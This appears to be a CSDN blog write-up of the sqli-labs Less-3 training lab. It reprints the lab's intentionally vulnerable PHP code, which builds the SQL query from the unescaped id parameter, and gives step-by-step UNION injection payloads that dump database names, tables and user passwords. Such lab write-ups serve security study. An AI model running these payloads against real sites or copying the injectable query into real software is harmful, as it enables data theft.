sqli-labs:less-3(字符型报错注入——有()包裹数据)

最新推荐文章于 2022-02-07 00:53:27 发布
最新推荐文章于 2022-02-07 00:53:27 发布
阅读量136 收藏
点赞数
分类专栏: SQL注入 文章标签: sql注入 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118697801
版权

SQL注入 错误提示 PHP 安全性 参数验证
关键词由CSDN通过智能技术生成

 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-3 Error Based- String (with Twist) </title>

</head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-3.jpg" /></center>
</body>
</html>

?id=1 and 1=1(正常回显)
?id=1 and 1=2(也正常)判断不是数字型
?id=1'(报错)从报错内容中看着有些不一样了,有个之前没有的),引起注意。
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1 
?id=1' and '1'='1(正常回显)
?id=1' and '1'='2(出错)

?id=1' order by 1--+(查列数的时候也有这样的报错信息,大胆猜测有个()包裹着传入的信息。)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1-- ') LIMIT 0,1' at line 1
?id=1') order by 1--+(修改传入信息,正常回显了)
然后接着判断,有三列。

?id=-1') union select 1,database(),group_concat(schema_name) from information_schema.schemata--+(查数据库)
?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+(查表名)
?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+(查列名)
?id=-1') union select 1,database(),group_concat(id,username,password) from users--+(查数据)

~羽~.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql错误信息 echo_MySQL 错误日志(Error Log)
weixin_34768234的博客
01-28 333
同大多数关系数据库一样,日志文件是MySQL数据库的重要组成部分。MySQL有几种不同的日志文件。通常包括错误日志文件,二进制日志,通用日志,慢查询日志,等等。这些日志能够帮助我们定位mysqld内部发生的事件,数据库性能故障,记录数据的变更历史,用户恢复数据库等等。本文主要描写叙述错误日志文件。1、MySQL日志文件系统的组成a、错误日志:记录启动、运行或停止mysqld时出现的问题。b、通用...
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4229
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
数据库操作
呆码
07-06 383
常用SQL语句 插入记录insert 在创建一个空的数据库和数据表后,使用insert语句向数据表中插入记录: insert into table_name(column_name1, column_name2, …) values(value1, value2, …) table_name表示要插入数据的表名,column_name1和column_name2表示表中的字段名,各行记录...
官方推荐的MySQL参数设置值
aecuhty88306453的博客
11-17 640
这oracle官方推荐的在OLTP环境下,MySQL参数设置的最佳实践。 下面的参数设置,对系统的性能会很有帮助。但是建议大家还是结合实际情况使用。 APPLIES TO: MySQL Server – Version 5.6 and laterInformation in this document applies to any platform. PURPOSE ...
Sqli-labs Less-3 Error Based- String (with Twist)
04-15 289
首先还是看网页提示输入id测试,输入id后加单引号看有什么输出。 payload /sql/Less-3/?id=1' 可以看到报错,报错在1后面有一个括号,换一个payload试一下。 payload /sql/Less-3/?id=1') --+ 可以看到可以正常显示内容。 接下来确定回显位置。 /sql/Less-3/?id=-1') union select 1,2,3--+ 可以看到回显位置为2和3的位置,这里要注意id要设置为-1才能够看到回显位置,因为id为-1
Sqli-Labs-Master】Less-5 (报错注入
Oavinci的博客
06-08 1212
Less5 单引号的注入 ?id=1' 报错 ?id=1'%23 尝试闭合,成功回显 看到这个报错信息,基本就行布尔盲注、报错注入、时间延迟盲注,UNION联合查询注入应该是不能用了。 查看源代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql)...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
* MySQL 环境:我们需要安装 MySQL 数据库来存储 sqli-labs 的数据。 * Java 环境:部分关卡需要 Java 环境,详细安装教程可以查看我另一篇文章 java 环境的配置。 Phpstudy 安装 首先,我们需要下载 Phpstudy ...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
sqli-labs遇到的问题处理
chenl_x的博客
02-07 4964
在搭建sqli-labs时出现了Unable to connect to the database: security错误,经过查询发现是php版本和sqli-lab中的不匹配。于是去phpstudy中修改了相应的php版本,但是又报错 Fatal error: Uncaught Error: Call to undefined function mysql_select_db() in 前往sqli-labs的sql-connection文件查看源码寻找问题。首先在文件中找到了第一个报错内容 @m.
sqli-labs:less-32(宽字节注入)
羽的博客
10-19 3074
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli-labs:less-27(过滤select和union)
羽的博客
09-14 480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs:less-9(时间盲注)
羽的博客
07-21 429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...
sqli-labs:less-26a(过滤了空格和注释,不能报错注入
羽的博客
09-14 343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs:less-7
羽的博客
07-14 319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值